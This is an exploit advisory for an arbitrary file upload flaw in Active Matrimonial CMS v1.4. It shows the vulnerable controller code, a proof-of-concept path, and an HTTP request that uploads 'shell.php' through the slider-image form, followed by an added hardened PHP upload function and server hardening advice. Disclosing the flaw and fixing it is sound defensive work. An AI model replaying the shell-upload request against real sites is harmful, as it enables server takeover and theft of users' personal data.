Active Matrimonial CMS v1.4 - Arbitrary File Upload

2018.08.15
N4TuraL (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Active Matrimonial CMS v1.4 - Arbitrary File Upload
# Date: 13/08/2018
# Exploit Author: N4TuraL
# Vendor Homepage: https://activeitzone.com/
# Greetz: Cyber Warrior - Bug Researchers

###############################################################################

### Description : ###

The "/admin/frontend_appearances/pages" page provides functionality to upload image files ('png, jpg, jpeg etc.').
An attacker can upload malicious files because the application does not properly validate the format of the uploaded file.

### Vulnerable Code : ###

File location = "application/controllers/Admin.php"

    if ($in_db == 'no') {
        $totally_new[] = array('index' => $i, 'img' => $img);
    }
    // the uploaded file is written to the web root with no check of its type or extension
    move_uploaded_file($_FILES['nimg']['tmp_name'][$i], 'uploads/home_page/slider_image/' . $img);
    /*$config1['image_library'] = 'gd2';
    $config1['create_thumb'] = TRUE;
    $config1['maintain_ratio'] = TRUE;
    $config1['width'] = '400';
    $config1['height'] = '400';
    $config1['source_image'] = 'uploads/home_page/slider_image/' . $img;
    $this->image_lib->initialize($config1);
    $this->image_lib->resize();
    $this->image_lib->clear();*/

### Proof of Concept : ###

../uploads/home_page/slider_image/slider_image_x.php

### Request : ###

Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-Length: 43114

slider_status=on&home_search_style=1&searching_heading=Search Your Soul Mates&slider_position=right&nimg[0]=&cnt[0]=3&nimg[1]=&nimg[2]=&nimg[3]=shell.php&cnt[3]=
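A hardened replacement for the move_uploaded_file() step above, added here as an example and not taken from the vendor's code base; the function name, the per-file array shape and the destination directory are assumptions. It allowlists the extension, checks that the bytes really are an image of that type, and stores the file under a random server-chosen name.

```php
<?php
// Added example (not Active Matrimonial CMS code): safe handling of one
// slider image. $file is one entry of the nimg[] multi-upload, rebuilt as
// ['name' => ..., 'tmp_name' => ..., 'error' => ...] for index $i.
function store_slider_image(array $file, string $dest_dir): ?string
{
    // Extension and sniffed MIME type must BOTH match an allowlisted pair.
    $allowed = [
        'png'  => 'image/png',
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
    ];

    // Only accept files that arrived through a successful HTTP upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // The extension comes from the client-supplied name: a first filter only.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // Content check: the bytes must decode as the image type the name claims.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext] || getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // Never reuse the client name; a random name with the verified extension
    // means a name like shell.php or image.php.jpg can never reach disk as-is.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dest_dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // readable, not executable
    return $name;
}

// Usage inside the controller loop (assumed), replacing the vulnerable call:
// $one = ['name'     => $_FILES['nimg']['name'][$i],
//         'tmp_name' => $_FILES['nimg']['tmp_name'][$i],
//         'error'    => $_FILES['nimg']['error'][$i]];
// $img = store_slider_image($one, 'uploads/home_page/slider_image');
```

Independently of the code check, the uploads/ tree should be served with script execution disabled (for example a `php_admin_flag engine off` or an equivalent nginx location rule), so a validation bypass still yields a static file rather than code execution.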

